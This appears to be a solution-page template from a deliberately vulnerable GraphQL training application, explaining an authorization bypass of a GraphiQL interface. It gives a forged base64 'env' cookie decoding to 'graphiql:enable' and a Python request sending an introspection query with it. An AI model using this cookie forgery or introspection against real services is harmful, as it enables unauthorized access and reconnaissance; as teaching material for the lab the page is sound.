{% extends 'partials/solutions/solution_base.html' %}
<!-- Start -->
{% block title %}Authorization Bypass :: GraphQL Interface Protection Bypass{% endblock %}

{% block body %}
  <p>
    GraphiQL is available at the path <code>/graphiql</code> with a poorly implemented authorization check.
  </p>
{% endblock %}

{% block resources %}
  <li>
    <a href="https://cwe.mitre.org/data/definitions/639.html" target="_blank">
      <i class="fa fa-newspaper"></i> CWE-639 - Authorization Bypass Through User-Controlled Key
    </a>
  </li>
{% endblock %}

{% block exploits %}
  <pre class="bash">
    # Beginner mode

    # Cookie 'env' stores a base64 encoded string with an instruction to disable graphiql. re-encoding with graphiql:enable bypasses the protection
    Z3JhcGhpcWw6ZGlzYWJsZQ==  - graphiql:disable

    # Specify a cookie that decodes to graphiql:enable to bypass this check:
    requests.post('http://host/graphiql',
      json={"query":"query IntrospectionQuery{__schema {queryType { name } mutationType { name } subscriptionType { name }}}"},
      cookies={'env':'Z3JhcGhpcWw6ZW5hYmxl'}
    )

    # Expert mode
    # GraphiQL interface is disabled.
  </pre>
{% endblock %}
<!-- End -->
